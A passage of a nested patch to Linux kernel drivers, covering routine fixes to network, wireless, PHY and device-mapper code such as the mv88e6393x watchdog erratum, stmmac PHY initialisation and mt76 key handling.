+ 	bool in_run = false;
+-	unsigned i;
++	unsigned int i;
+ 
+ 	for (i = 0; i < count; i++, value_le++) {
+ 		b = le64_to_cpu(*value_le);
+diff --git a/drivers/md/persistent-data/dm-transaction-manager.h b/drivers/md/persistent-data/dm-transaction-manager.h
+index 906c02ed0365b..0f573a4a01aeb 100644
+--- a/drivers/md/persistent-data/dm-transaction-manager.h
++++ b/drivers/md/persistent-data/dm-transaction-manager.h
+@@ -111,7 +111,7 @@ void dm_tm_dec_range(struct dm_transaction_manager *tm, dm_block_t b, dm_block_t
+  */
+ typedef void (*dm_tm_run_fn)(struct dm_transaction_manager *, dm_block_t, dm_block_t);
+ void dm_tm_with_runs(struct dm_transaction_manager *tm,
+-		     const __le64 *value_le, unsigned count, dm_tm_run_fn fn);
++		     const __le64 *value_le, unsigned int count, dm_tm_run_fn fn);
+ 
+ int dm_tm_ref(struct dm_transaction_manager *tm, dm_block_t b, uint32_t *result);
+ 
+diff --git a/drivers/net/dsa/mv88e6xxx/chip.c b/drivers/net/dsa/mv88e6xxx/chip.c
+index 8211a4d373e81..e57d86484a3a4 100644
+--- a/drivers/net/dsa/mv88e6xxx/chip.c
++++ b/drivers/net/dsa/mv88e6xxx/chip.c
+@@ -5518,7 +5518,7 @@ static const struct mv88e6xxx_ops mv88e6393x_ops = {
+ 	 * .port_set_upstream_port method.
+ 	 */
+ 	.set_egress_port = mv88e6393x_set_egress_port,
+-	.watchdog_ops = &mv88e6390_watchdog_ops,
++	.watchdog_ops = &mv88e6393x_watchdog_ops,
+ 	.mgmt_rsvd2cpu = mv88e6393x_port_mgmt_rsvd2cpu,
+ 	.pot_clear = mv88e6xxx_g2_pot_clear,
+ 	.reset = mv88e6352_g1_reset,
+diff --git a/drivers/net/dsa/mv88e6xxx/global2.c b/drivers/net/dsa/mv88e6xxx/global2.c
+index fa65ecd9cb853..ec49939968fac 100644
+--- a/drivers/net/dsa/mv88e6xxx/global2.c
++++ b/drivers/net/dsa/mv88e6xxx/global2.c
+@@ -931,6 +931,26 @@ const struct mv88e6xxx_irq_ops mv88e6390_watchdog_ops = {
+ 	.irq_free = mv88e6390_watchdog_free,
+ };
+ 
++static int mv88e6393x_watchdog_action(struct mv88e6xxx_chip *chip, int irq)
++{
++	mv88e6390_watchdog_action(chip, irq);
++
++	/* Fix for clearing the force WD event bit.
++	 * Unreleased erratum on mv88e6393x.
++	 */
++	mv88e6xxx_g2_write(chip, MV88E6390_G2_WDOG_CTL,
++			   MV88E6390_G2_WDOG_CTL_UPDATE |
++			   MV88E6390_G2_WDOG_CTL_PTR_EVENT);
++
++	return IRQ_HANDLED;
++}
++
++const struct mv88e6xxx_irq_ops mv88e6393x_watchdog_ops = {
++	.irq_action = mv88e6393x_watchdog_action,
++	.irq_setup = mv88e6390_watchdog_setup,
++	.irq_free = mv88e6390_watchdog_free,
++};
++
+ static irqreturn_t mv88e6xxx_g2_watchdog_thread_fn(int irq, void *dev_id)
+ {
+ 	struct mv88e6xxx_chip *chip = dev_id;
+diff --git a/drivers/net/dsa/mv88e6xxx/global2.h b/drivers/net/dsa/mv88e6xxx/global2.h
+index 7536b8b0ad011..c05fad5c9f19d 100644
+--- a/drivers/net/dsa/mv88e6xxx/global2.h
++++ b/drivers/net/dsa/mv88e6xxx/global2.h
+@@ -363,6 +363,7 @@ int mv88e6xxx_g2_device_mapping_write(struct mv88e6xxx_chip *chip, int target,
+ extern const struct mv88e6xxx_irq_ops mv88e6097_watchdog_ops;
+ extern const struct mv88e6xxx_irq_ops mv88e6250_watchdog_ops;
+ extern const struct mv88e6xxx_irq_ops mv88e6390_watchdog_ops;
++extern const struct mv88e6xxx_irq_ops mv88e6393x_watchdog_ops;
+ 
+ extern const struct mv88e6xxx_avb_ops mv88e6165_avb_ops;
+ extern const struct mv88e6xxx_avb_ops mv88e6352_avb_ops;
+diff --git a/drivers/net/ethernet/google/gve/gve.h b/drivers/net/ethernet/google/gve/gve.h
+index 64eb0442c82fd..005cb9dfe078b 100644
+--- a/drivers/net/ethernet/google/gve/gve.h
++++ b/drivers/net/ethernet/google/gve/gve.h
+@@ -47,6 +47,8 @@
+ 
+ #define GVE_RX_BUFFER_SIZE_DQO 2048
+ 
++#define GVE_GQ_TX_MIN_PKT_DESC_BYTES 182
++
+ /* Each slot in the desc ring has a 1:1 mapping to a slot in the data ring */
+ struct gve_rx_desc_queue {
+ 	struct gve_rx_desc *desc_ring; /* the descriptor ring */
+diff --git a/drivers/net/ethernet/google/gve/gve_tx.c b/drivers/net/ethernet/google/gve/gve_tx.c
+index 4888bf05fbedb..5e11b82367545 100644
+--- a/drivers/net/ethernet/google/gve/gve_tx.c
++++ b/drivers/net/ethernet/google/gve/gve_tx.c
+@@ -284,8 +284,8 @@ static inline int gve_skb_fifo_bytes_required(struct gve_tx_ring *tx,
+ 	int bytes;
+ 	int hlen;
+ 
+-	hlen = skb_is_gso(skb) ? skb_checksum_start_offset(skb) +
+-				 tcp_hdrlen(skb) : skb_headlen(skb);
++	hlen = skb_is_gso(skb) ? skb_checksum_start_offset(skb) + tcp_hdrlen(skb) :
++				 min_t(int, GVE_GQ_TX_MIN_PKT_DESC_BYTES, skb->len);
+ 
+ 	pad_bytes = gve_tx_fifo_pad_alloc_one_frag(&tx->tx_fifo,
+ 						   hlen);
+@@ -454,13 +454,11 @@ static int gve_tx_add_skb_copy(struct gve_priv *priv, struct gve_tx_ring *tx, st
+ 	pkt_desc = &tx->desc[idx];
+ 
+ 	l4_hdr_offset = skb_checksum_start_offset(skb);
+-	/* If the skb is gso, then we want the tcp header in the first segment
+-	 * otherwise we want the linear portion of the skb (which will contain
+-	 * the checksum because skb->csum_start and skb->csum_offset are given
+-	 * relative to skb->head) in the first segment.
++	/* If the skb is gso, then we want the tcp header alone in the first segment
++	 * otherwise we want the minimum required by the gVNIC spec.
+ 	 */
+ 	hlen = is_gso ? l4_hdr_offset + tcp_hdrlen(skb) :
+-			skb_headlen(skb);
++			min_t(int, GVE_GQ_TX_MIN_PKT_DESC_BYTES, skb->len);
+ 
+ 	info->skb =  skb;
+ 	/* We don't want to split the header, so if necessary, pad to the end
+diff --git a/drivers/net/ethernet/intel/ice/ice_virtchnl_fdir.c b/drivers/net/ethernet/intel/ice/ice_virtchnl_fdir.c
+index a2645ff3100e4..7f72604079723 100644
+--- a/drivers/net/ethernet/intel/ice/ice_virtchnl_fdir.c
++++ b/drivers/net/ethernet/intel/ice/ice_virtchnl_fdir.c
+@@ -541,6 +541,21 @@ static void ice_vc_fdir_rem_prof_all(struct ice_vf *vf)
+ 	}
+ }
+ 
++/**
++ * ice_vc_fdir_reset_cnt_all - reset all FDIR counters for this VF FDIR
++ * @fdir: pointer to the VF FDIR structure
++ */
++static void ice_vc_fdir_reset_cnt_all(struct ice_vf_fdir *fdir)
++{
++	enum ice_fltr_ptype flow;
++
++	for (flow = ICE_FLTR_PTYPE_NONF_NONE;
++	     flow < ICE_FLTR_PTYPE_MAX; flow++) {
++		fdir->fdir_fltr_cnt[flow][0] = 0;
++		fdir->fdir_fltr_cnt[flow][1] = 0;
++	}
++}
++
+ /**
+  * ice_vc_fdir_has_prof_conflict
+  * @vf: pointer to the VF structure
+@@ -1871,7 +1886,7 @@ int ice_vc_add_fdir_fltr(struct ice_vf *vf, u8 *msg)
+ 		v_ret = VIRTCHNL_STATUS_SUCCESS;
+ 		stat->status = VIRTCHNL_FDIR_FAILURE_RULE_NORESOURCE;
+ 		dev_dbg(dev, "VF %d: set FDIR context failed\n", vf->vf_id);
+-		goto err_free_conf;
++		goto err_rem_entry;
+ 	}
+ 
+ 	ret = ice_vc_fdir_write_fltr(vf, conf, true, is_tun);
+@@ -1880,15 +1895,16 @@ int ice_vc_add_fdir_fltr(struct ice_vf *vf, u8 *msg)
+ 		stat->status = VIRTCHNL_FDIR_FAILURE_RULE_NORESOURCE;
+ 		dev_err(dev, "VF %d: writing FDIR rule failed, ret:%d\n",
+ 			vf->vf_id, ret);
+-		goto err_rem_entry;
++		goto err_clr_irq;
+ 	}
+ 
+ exit:
+ 	kfree(stat);
+ 	return ret;
+ 
+-err_rem_entry:
++err_clr_irq:
+ 	ice_vc_fdir_clear_irq_ctx(vf);
++err_rem_entry:
+ 	ice_vc_fdir_remove_entry(vf, conf, conf->flow_id);
+ err_free_conf:
+ 	devm_kfree(dev, conf);
+@@ -1997,6 +2013,7 @@ void ice_vf_fdir_init(struct ice_vf *vf)
+ 	spin_lock_init(&fdir->ctx_lock);
+ 	fdir->ctx_irq.flags = 0;
+ 	fdir->ctx_done.flags = 0;
++	ice_vc_fdir_reset_cnt_all(fdir);
+ }
+ 
+ /**
+diff --git a/drivers/net/ethernet/mediatek/mtk_eth_soc.c b/drivers/net/ethernet/mediatek/mtk_eth_soc.c
+index bd7c18c839d42..f56d4e7d4ae5d 100644
+--- a/drivers/net/ethernet/mediatek/mtk_eth_soc.c
++++ b/drivers/net/ethernet/mediatek/mtk_eth_soc.c
+@@ -703,6 +703,7 @@ static void mtk_mac_link_up(struct phylink_config *config,
+ 		 MAC_MCR_FORCE_RX_FC);
+ 
+ 	/* Configure speed */
++	mac->speed = speed;
+ 	switch (speed) {
+ 	case SPEED_2500:
+ 	case SPEED_1000:
+@@ -3169,6 +3170,9 @@ found:
+ 	if (dp->index >= MTK_QDMA_NUM_QUEUES)
+ 		return NOTIFY_DONE;
+ 
++	if (mac->speed > 0 && mac->speed <= s.base.speed)
++		s.base.speed = 0;
++
+ 	mtk_set_queue_speed(eth, dp->index + 3, s.base.speed);
+ 
+ 	return NOTIFY_DONE;
+diff --git a/drivers/net/ethernet/stmicro/stmmac/dwmac-intel.c b/drivers/net/ethernet/stmicro/stmmac/dwmac-intel.c
+index 13aa919633b47..ab9f876b6df7e 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/dwmac-intel.c
++++ b/drivers/net/ethernet/stmicro/stmmac/dwmac-intel.c
+@@ -251,7 +251,6 @@ static void intel_speed_mode_2500(struct net_device *ndev, void *intel_data)
+ 		priv->plat->mdio_bus_data->xpcs_an_inband = false;
+ 	} else {
+ 		priv->plat->max_speed = 1000;
+-		priv->plat->mdio_bus_data->xpcs_an_inband = true;
+ 	}
+ }
+ 
+diff --git a/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c b/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
+index 7389718b4797b..014ce97f96b15 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
++++ b/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
+@@ -1134,20 +1134,26 @@ static void stmmac_check_pcs_mode(struct stmmac_priv *priv)
+ static int stmmac_init_phy(struct net_device *dev)
+ {
+ 	struct stmmac_priv *priv = netdev_priv(dev);
++	struct fwnode_handle *phy_fwnode;
+ 	struct fwnode_handle *fwnode;
+ 	int ret;
+ 
++	if (!phylink_expects_phy(priv->phylink))
++		return 0;
++
+ 	fwnode = of_fwnode_handle(priv->plat->phylink_node);
+ 	if (!fwnode)
+ 		fwnode = dev_fwnode(priv->device);
+ 
+ 	if (fwnode)
+-		ret = phylink_fwnode_phy_connect(priv->phylink, fwnode, 0);
++		phy_fwnode = fwnode_get_phy_node(fwnode);
++	else
++		phy_fwnode = NULL;
+ 
+ 	/* Some DT bindings do not set-up the PHY handle. Let's try to
+ 	 * manually parse it
+ 	 */
+-	if (!fwnode || ret) {
++	if (!phy_fwnode || IS_ERR(phy_fwnode)) {
+ 		int addr = priv->plat->phy_addr;
+ 		struct phy_device *phydev;
+ 
+@@ -1163,6 +1169,9 @@ static int stmmac_init_phy(struct net_device *dev)
+ 		}
+ 
+ 		ret = phylink_connect_phy(priv->phylink, phydev);
++	} else {
++		fwnode_handle_put(phy_fwnode);
++		ret = phylink_fwnode_phy_connect(priv->phylink, fwnode, 0);
+ 	}
+ 
+ 	if (!priv->plat->pmt) {
+@@ -6620,6 +6629,8 @@ int stmmac_xdp_open(struct net_device *dev)
+ 		goto init_error;
+ 	}
+ 
++	stmmac_reset_queues_param(priv);
++
+ 	/* DMA CSR Channel configuration */
+ 	for (chan = 0; chan < dma_csr_ch; chan++) {
+ 		stmmac_init_chan(priv, priv->ioaddr, priv->plat->dma_cfg, chan);
+@@ -6946,7 +6957,7 @@ static void stmmac_napi_del(struct net_device *dev)
+ int stmmac_reinit_queues(struct net_device *dev, u32 rx_cnt, u32 tx_cnt)
+ {
+ 	struct stmmac_priv *priv = netdev_priv(dev);
+-	int ret = 0;
++	int ret = 0, i;
+ 
+ 	if (netif_running(dev))
+ 		stmmac_release(dev);
+@@ -6955,6 +6966,10 @@ int stmmac_reinit_queues(struct net_device *dev, u32 rx_cnt, u32 tx_cnt)
+ 
+ 	priv->plat->rx_queues_to_use = rx_cnt;
+ 	priv->plat->tx_queues_to_use = tx_cnt;
++	if (!netif_is_rxfh_configured(dev))
++		for (i = 0; i < ARRAY_SIZE(priv->rss.table); i++)
++			priv->rss.table[i] = ethtool_rxfh_indir_default(i,
++									rx_cnt);
+ 
+ 	stmmac_napi_add(dev);
+ 
+diff --git a/drivers/net/ethernet/ti/am65-cpsw-nuss.c b/drivers/net/ethernet/ti/am65-cpsw-nuss.c
+index 3e17152798554..9286b2b3353e3 100644
+--- a/drivers/net/ethernet/ti/am65-cpsw-nuss.c
++++ b/drivers/net/ethernet/ti/am65-cpsw-nuss.c
+@@ -2854,7 +2854,8 @@ err_free_phylink:
+ 	am65_cpsw_nuss_phylink_cleanup(common);
+ 	am65_cpts_release(common->cpts);
+ err_of_clear:
+-	of_platform_device_destroy(common->mdio_dev, NULL);
++	if (common->mdio_dev)
++		of_platform_device_destroy(common->mdio_dev, NULL);
+ err_pm_clear:
+ 	pm_runtime_put_sync(dev);
+ 	pm_runtime_disable(dev);
+@@ -2883,7 +2884,8 @@ static int am65_cpsw_nuss_remove(struct platform_device *pdev)
+ 	am65_cpsw_nuss_phylink_cleanup(common);
+ 	am65_cpts_release(common->cpts);
+ 
+-	of_platform_device_destroy(common->mdio_dev, NULL);
++	if (common->mdio_dev)
++		of_platform_device_destroy(common->mdio_dev, NULL);
+ 
+ 	pm_runtime_put_sync(&pdev->dev);
+ 	pm_runtime_disable(&pdev->dev);
+diff --git a/drivers/net/phy/phylink.c b/drivers/net/phy/phylink.c
+index 4d2519cdb8012..bf8a8ed5d5d7b 100644
+--- a/drivers/net/phy/phylink.c
++++ b/drivers/net/phy/phylink.c
+@@ -1571,6 +1571,25 @@ void phylink_destroy(struct phylink *pl)
+ }
+ EXPORT_SYMBOL_GPL(phylink_destroy);
+ 
++/**
++ * phylink_expects_phy() - Determine if phylink expects a phy to be attached
++ * @pl: a pointer to a &struct phylink returned from phylink_create()
++ *
++ * When using fixed-link mode, or in-band mode with 1000base-X or 2500base-X,
++ * no PHY is needed.
++ *
++ * Returns true if phylink will be expecting a PHY.
++ */
++bool phylink_expects_phy(struct phylink *pl)
++{
++	if (pl->cfg_link_an_mode == MLO_AN_FIXED ||
++	    (pl->cfg_link_an_mode == MLO_AN_INBAND &&
++	     phy_interface_mode_is_8023z(pl->link_config.interface)))
++		return false;
++	return true;
++}
++EXPORT_SYMBOL_GPL(phylink_expects_phy);
++
+ static void phylink_phy_change(struct phy_device *phydev, bool up)
+ {
+ 	struct phylink *pl = phydev->phylink;
+diff --git a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/bcmsdh.c b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/bcmsdh.c
+index b7c918f241c91..65d4799a56584 100644
+--- a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/bcmsdh.c
++++ b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/bcmsdh.c
+@@ -994,15 +994,34 @@ static const struct sdio_device_id brcmf_sdmmc_ids[] = {
+ MODULE_DEVICE_TABLE(sdio, brcmf_sdmmc_ids);
+ 
+ 
+-static void brcmf_sdiod_acpi_set_power_manageable(struct device *dev,
+-						  int val)
++static void brcmf_sdiod_acpi_save_power_manageable(struct brcmf_sdio_dev *sdiodev)
+ {
+ #if IS_ENABLED(CONFIG_ACPI)
+ 	struct acpi_device *adev;
+ 
+-	adev = ACPI_COMPANION(dev);
++	adev = ACPI_COMPANION(&sdiodev->func1->dev);
+ 	if (adev)
+-		adev->flags.power_manageable = 0;
++		sdiodev->func1_power_manageable = adev->flags.power_manageable;
++
++	adev = ACPI_COMPANION(&sdiodev->func2->dev);
++	if (adev)
++		sdiodev->func2_power_manageable = adev->flags.power_manageable;
++#endif
++}
++
++static void brcmf_sdiod_acpi_set_power_manageable(struct brcmf_sdio_dev *sdiodev,
++						  int enable)
++{
++#if IS_ENABLED(CONFIG_ACPI)
++	struct acpi_device *adev;
++
++	adev = ACPI_COMPANION(&sdiodev->func1->dev);
++	if (adev)
++		adev->flags.power_manageable = enable ? sdiodev->func1_power_manageable : 0;
++
++	adev = ACPI_COMPANION(&sdiodev->func2->dev);
++	if (adev)
++		adev->flags.power_manageable = enable ? sdiodev->func2_power_manageable : 0;
+ #endif
+ }
+ 
+@@ -1012,7 +1031,6 @@ static int brcmf_ops_sdio_probe(struct sdio_func *func,
+ 	int err;
+ 	struct brcmf_sdio_dev *sdiodev;
+ 	struct brcmf_bus *bus_if;
+-	struct device *dev;
+ 
+ 	brcmf_dbg(SDIO, "Enter\n");
+ 	brcmf_dbg(SDIO, "Class=%x\n", func->class);
+@@ -1020,14 +1038,9 @@ static int brcmf_ops_sdio_probe(struct sdio_func *func,
+ 	brcmf_dbg(SDIO, "sdio device ID: 0x%04x\n", func->device);
+ 	brcmf_dbg(SDIO, "Function#: %d\n", func->num);
+ 
+-	dev = &func->dev;
+-
+ 	/* Set MMC_QUIRK_LENIENT_FN0 for this card */
+ 	func->card->quirks |= MMC_QUIRK_LENIENT_FN0;
+ 
+-	/* prohibit ACPI power management for this device */
+-	brcmf_sdiod_acpi_set_power_manageable(dev, 0);
+-
+ 	/* Consume func num 1 but dont do anything with it. */
+ 	if (func->num == 1)
+ 		return 0;
+@@ -1059,6 +1072,7 @@ static int brcmf_ops_sdio_probe(struct sdio_func *func,
+ 	dev_set_drvdata(&sdiodev->func1->dev, bus_if);
+ 	sdiodev->dev = &sdiodev->func1->dev;
+ 
++	brcmf_sdiod_acpi_save_power_manageable(sdiodev);
+ 	brcmf_sdiod_change_state(sdiodev, BRCMF_SDIOD_DOWN);
+ 
+ 	brcmf_dbg(SDIO, "F2 found, calling brcmf_sdiod_probe...\n");
+@@ -1124,6 +1138,8 @@ void brcmf_sdio_wowl_config(struct device *dev, bool enabled)
+ 
+ 	if (sdiodev->settings->bus.sdio.oob_irq_supported ||
+ 	    pm_caps & MMC_PM_WAKE_SDIO_IRQ) {
++		/* Stop ACPI from turning off the device when wowl is enabled */
++		brcmf_sdiod_acpi_set_power_manageable(sdiodev, !enabled);
+ 		sdiodev->wowl_enabled = enabled;
+ 		brcmf_dbg(SDIO, "Configuring WOWL, enabled=%d\n", enabled);
+ 		return;
+diff --git a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/sdio.h b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/sdio.h
+index b76d34d36bde6..0d18ed15b4032 100644
+--- a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/sdio.h
++++ b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/sdio.h
+@@ -188,6 +188,8 @@ struct brcmf_sdio_dev {
+ 	char nvram_name[BRCMF_FW_NAME_LEN];
+ 	char clm_name[BRCMF_FW_NAME_LEN];
+ 	bool wowl_enabled;
++	bool func1_power_manageable;
++	bool func2_power_manageable;
+ 	enum brcmf_sdiod_state state;
+ 	struct brcmf_sdiod_freezer *freezer;
+ 	const struct firmware *clm_fw;
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7603/main.c b/drivers/net/wireless/mediatek/mt76/mt7603/main.c
+index ca50feb0b3a9d..1b1358c6bb464 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7603/main.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7603/main.c
+@@ -512,15 +512,15 @@ mt7603_set_key(struct ieee80211_hw *hw, enum set_key_cmd cmd,
+ 	    !(key->flags & IEEE80211_KEY_FLAG_PAIRWISE))
+ 		return -EOPNOTSUPP;
+ 
+-	if (cmd == SET_KEY) {
+-		key->hw_key_idx = wcid->idx;
+-		wcid->hw_key_idx = idx;
+-	} else {
++	if (cmd != SET_KEY) {
+ 		if (idx == wcid->hw_key_idx)
+ 			wcid->hw_key_idx = -1;
+ 
+-		key = NULL;
++		return 0;
+ 	}
++
++	key->hw_key_idx = wcid->idx;
++	wcid->hw_key_idx = idx;
+ 	mt76_wcid_key_setup(&dev->mt76, wcid, key);
+ 
+ 	return mt7603_wtbl_set_key(dev, wcid->idx, key);
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7615/mac.c b/drivers/net/wireless/mediatek/mt76/mt7615/mac.c
+index a95602473359e..51a968a6afdc9 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7615/mac.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7615/mac.c
+@@ -1193,8 +1193,7 @@ EXPORT_SYMBOL_GPL(mt7615_mac_enable_rtscts);
+ static int
+ mt7615_mac_wtbl_update_key(struct mt7615_dev *dev, struct mt76_wcid *wcid,
+ 			   struct ieee80211_key_conf *key,
+-			   enum mt76_cipher_type cipher, u16 cipher_mask,
+-			   enum set_key_cmd cmd)
++			   enum mt76_cipher_type cipher, u16 cipher_mask)
+ {
+ 	u32 addr = mt7615_mac_wtbl_addr(dev, wcid->idx) + 30 * 4;
+ 	u8 data[32] = {};
+@@ -1203,27 +1202,18 @@ mt7615_mac_wtbl_update_key(struct mt7615_dev *dev, struct mt76_wcid *wcid,
+ 		return -EINVAL;
+ 
+ 	mt76_rr_copy(dev, addr, data, sizeof(data));
+-	if (cmd == SET_KEY) {
+-		if (cipher == MT_CIPHER_TKIP) {
+-			/* Rx/Tx MIC keys are swapped */
+-			memcpy(data, key->key, 16);
+-			memcpy(data + 16, key->key + 24, 8);
+-			memcpy(data + 24, key->key + 16, 8);
+-		} else {
+-			if (cipher_mask == BIT(cipher))
+-				memcpy(data, key->key, key->keylen);
+-			else if (cipher != MT_CIPHER_BIP_CMAC_128)
+-				memcpy(data, key->key, 16);
+-			if (cipher == MT_CIPHER_BIP_CMAC_128)
+-				memcpy(data + 16, key->key, 16);
+-		}
++	if (cipher == MT_CIPHER_TKIP) {
++		/* Rx/Tx MIC keys are swapped */
++		memcpy(data, key->key, 16);
++		memcpy(data + 16, key->key + 24, 8);
++		memcpy(data + 24, key->key + 16, 8);
+ 	} else {
++		if (cipher_mask == BIT(cipher))
++			memcpy(data, key->key, key->keylen);
++		else if (cipher != MT_CIPHER_BIP_CMAC_128)
++			memcpy(data, key->key, 16);
+ 		if (cipher == MT_CIPHER_BIP_CMAC_128)
+-			memset(data + 16, 0, 16);
+-		else if (cipher_mask)
+-			memset(data, 0, 16);
+-		if (!cipher_mask)
+-			memset(data, 0, sizeof(data));
++			memcpy(data + 16, key->key, 16);
+ 	}
+ 
+ 	mt76_wr_copy(dev, addr, data, sizeof(data));
+@@ -1234,7 +1224,7 @@ mt7615_mac_wtbl_update_key(struct mt7615_dev *dev, struct mt76_wcid *wcid,
+ static int
+ mt7615_mac_wtbl_update_pk(struct mt7615_dev *dev, struct mt76_wcid *wcid,
+ 			  enum mt76_cipher_type cipher, u16 cipher_mask,
+-			  int keyidx, enum set_key_cmd cmd)
++			  int keyidx)
+ {
+ 	u32 addr = mt7615_mac_wtbl_addr(dev, wcid->idx), w0, w1;
+ 
+@@ -1253,9 +1243,7 @@ mt7615_mac_wtbl_update_pk(struct mt7615_dev *dev, struct mt76_wcid *wcid,
+ 	else
+ 		w0 &= ~MT_WTBL_W0_RX_IK_VALID;
+ 
+-	if (cmd == SET_KEY &&
+-	    (cipher != MT_CIPHER_BIP_CMAC_128 ||
+-	     cipher_mask == BIT(cipher))) {
++	if (cipher != MT_CIPHER_BIP_CMAC_128 || cipher_mask == BIT(cipher)) {
+ 		w0 &= ~MT_WTBL_W0_KEY_IDX;
+ 		w0 |= FIELD_PREP(MT_WTBL_W0_KEY_IDX, keyidx);
+ 	}
+@@ -1272,19 +1260,10 @@ mt7615_mac_wtbl_update_pk(struct mt7615_dev *dev, struct mt76_wcid *wcid,
+ 
+ static void
+ mt7615_mac_wtbl_update_cipher(struct mt7615_dev *dev, struct mt76_wcid *wcid,
+-			      enum mt76_cipher_type cipher, u16 cipher_mask,
+-			      enum set_key_cmd cmd)
++			      enum mt76_cipher_type cipher, u16 cipher_mask)
+ {
+ 	u32 addr = mt7615_mac_wtbl_addr(dev, wcid->idx);
+ 
+-	if (!cipher_mask) {
+-		mt76_clear(dev, addr + 2 * 4, MT_WTBL_W2_KEY_TYPE);
+-		return;
+-	}
+-
+-	if (cmd != SET_KEY)
+-		return;
+-
+ 	if (cipher == MT_CIPHER_BIP_CMAC_128 &&
+ 	    cipher_mask & ~BIT(MT_CIPHER_BIP_CMAC_128))
+ 		return;
+@@ -1295,8 +1274,7 @@ mt7615_mac_wtbl_update_cipher(struct mt7615_dev *dev, struct mt76_wcid *wcid,
+ 
+ int __mt7615_mac_wtbl_set_key(struct mt7615_dev *dev,
+ 			      struct mt76_wcid *wcid,
+-			      struct ieee80211_key_conf *key,
+-			      enum set_key_cmd cmd)
++			      struct ieee80211_key_conf *key)
+ {
+ 	enum mt76_cipher_type cipher;
+ 	u16 cipher_mask = wcid->cipher;
+@@ -1306,19 +1284,14 @@ int __mt7615_mac_wtbl_set_key(struct mt7615_dev *dev,
+ 	if (cipher == MT_CIPHER_NONE)
+ 		return -EOPNOTSUPP;
+ 
+-	if (cmd == SET_KEY)
+-		cipher_mask |= BIT(cipher);
+-	else
+-		cipher_mask &= ~BIT(cipher);
+-
+-	mt7615_mac_wtbl_update_cipher(dev, wcid, cipher, cipher_mask, cmd);
+-	err = mt7615_mac_wtbl_update_key(dev, wcid, key, cipher, cipher_mask,
+-					 cmd);
++	cipher_mask |= BIT(cipher);
++	mt7615_mac_wtbl_update_cipher(dev, wcid, cipher, cipher_mask);
++	err = mt7615_mac_wtbl_update_key(dev, wcid, key, cipher, cipher_mask);
+ 	if (err < 0)
+ 		return err;
+ 
+ 	err = mt7615_mac_wtbl_update_pk(dev, wcid, cipher, cipher_mask,
+-					key->keyidx, cmd);
++					key->keyidx);
+ 	if (err < 0)
+ 		return err;
+ 
+@@ -1329,13 +1302,12 @@ int __mt7615_mac_wtbl_set_key(struct mt7615_dev *dev,
+ 
+ int mt7615_mac_wtbl_set_key(struct mt7615_dev *dev,
+ 			    struct mt76_wcid *wcid,
+-			    struct ieee80211_key_conf *key,
+-			    enum set_key_cmd cmd)
++			    struct ieee80211_key_conf *key)
+ {
+ 	int err;
+ 
+ 	spin_lock_bh(&dev->mt76.lock);
+-	err = __mt7615_mac_wtbl_set_key(dev, wcid, key, cmd);
++	err = __mt7615_mac_wtbl_set_key(dev, wcid, key);
+ 	spin_unlock_bh(&dev->mt76.lock);
+ 
+ 	return err;
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7615/main.c b/drivers/net/wireless/mediatek/mt76/mt7615/main.c
+index ab4c1b4478aa9..dadb13f2ca095 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7615/main.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7615/main.c
+@@ -391,18 +391,17 @@ static int mt7615_set_key(struct ieee80211_hw *hw, enum set_key_cmd cmd,
+ 
+ 	if (cmd == SET_KEY)
+ 		*wcid_keyidx = idx;
+-	else if (idx == *wcid_keyidx)
+-		*wcid_keyidx = -1;
+-	else
++	else {
++		if (idx == *wcid_keyidx)
++			*wcid_keyidx = -1;
+ 		goto out;
++	}
+ 
+-	mt76_wcid_key_setup(&dev->mt76, wcid,
+-			    cmd == SET_KEY ? key : NULL);
+-
++	mt76_wcid_key_setup(&dev->mt76, wcid, key);
+ 	if (mt76_is_mmio(&dev->mt76))
+-		err = mt7615_mac_wtbl_set_key(dev, wcid, key, cmd);
++		err = mt7615_mac_wtbl_set_key(dev, wcid, key);
+ 	else
+-		err = __mt7615_mac_wtbl_set_key(dev, wcid, key, cmd);
++		err = __mt7615_mac_wtbl_set_key(dev, wcid, key);
+ 
+ out:
+ 	mt7615_mutex_release(dev);
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7615/mt7615.h b/drivers/net/wireless/mediatek/mt76/mt7615/mt7615.h
+index 087d4886162e6..ab10ad0ecdedd 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7615/mt7615.h
++++ b/drivers/net/wireless/mediatek/mt76/mt7615/mt7615.h
+@@ -484,11 +484,9 @@ int mt7615_mac_write_txwi(struct mt7615_dev *dev, __le32 *txwi,
+ void mt7615_mac_set_timing(struct mt7615_phy *phy);
+ int __mt7615_mac_wtbl_set_key(struct mt7615_dev *dev,
+ 			      struct mt76_wcid *wcid,
+-			      struct ieee80211_key_conf *key,
+-			      enum set_key_cmd cmd);
++			      struct ieee80211_key_conf *key);
+ int mt7615_mac_wtbl_set_key(struct mt7615_dev *dev, struct mt76_wcid *wcid,
+-			    struct ieee80211_key_conf *key,
+-			    enum set_key_cmd cmd);
++			    struct ieee80211_key_conf *key);
+ void mt7615_mac_reset_work(struct work_struct *work);
+ u32 mt7615_mac_get_sta_tid_sn(struct mt7615_dev *dev, int wcid, u8 tid);
+ 
+diff --git a/drivers/net/wireless/mediatek/mt76/mt76x02_util.c b/drivers/net/wireless/mediatek/mt76/mt76x02_util.c
+index 604ddcc211231..324535a0dd6d4 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt76x02_util.c
++++ b/drivers/net/wireless/mediatek/mt76/mt76x02_util.c
